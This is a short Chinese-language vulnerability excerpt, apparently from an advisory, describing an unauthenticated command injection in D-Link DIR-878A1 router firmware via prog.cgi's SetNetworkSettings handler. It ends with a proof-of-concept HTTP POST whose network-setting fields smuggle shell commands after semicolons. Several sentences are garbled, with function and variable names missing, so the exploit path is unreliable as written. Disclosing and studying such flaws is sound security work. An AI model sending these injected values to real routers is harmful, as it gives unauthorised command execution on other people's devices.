关键信息摘录 1. 漏洞概述 受影响产品: D-Link DIR-878A1 路由器 固件版本: FW101B04.bin (其他版本需要验证) 漏洞类型: 无需身份验证的命令注入 易受攻击组件: prog.cgi (SetNetworkSettings 处理函数) 前提条件: 无需身份验证(可能远程利用漏洞) 2. 利用路径 在 中,通过 和 获取的用户输入被连接并传递给 函数,导致命令注入。 4. 0-Day 命令注入利用路径 行5: 通过 获取用户输入。 行16: 连接并传递给 导致命令注入。 行8: 通过 获取用户输入。 行22: 连接并传递给 导致命令注入。 5. 复现漏洞的概念证明 (PoC) ```http POST /cgi-bin/prog.cgi HTTP/1.1 Host: 192.168.0.1 Content-Type: application/xml 127.0.0.1; ls > /tmp/result.txt # 255.255.255.0 192.168.0.1 255.255.255.0; ls > /tmp/result.txt 127.0.0.1; ls > /tmp/result.txt 255.255.255.0; top > /tmp/result.txt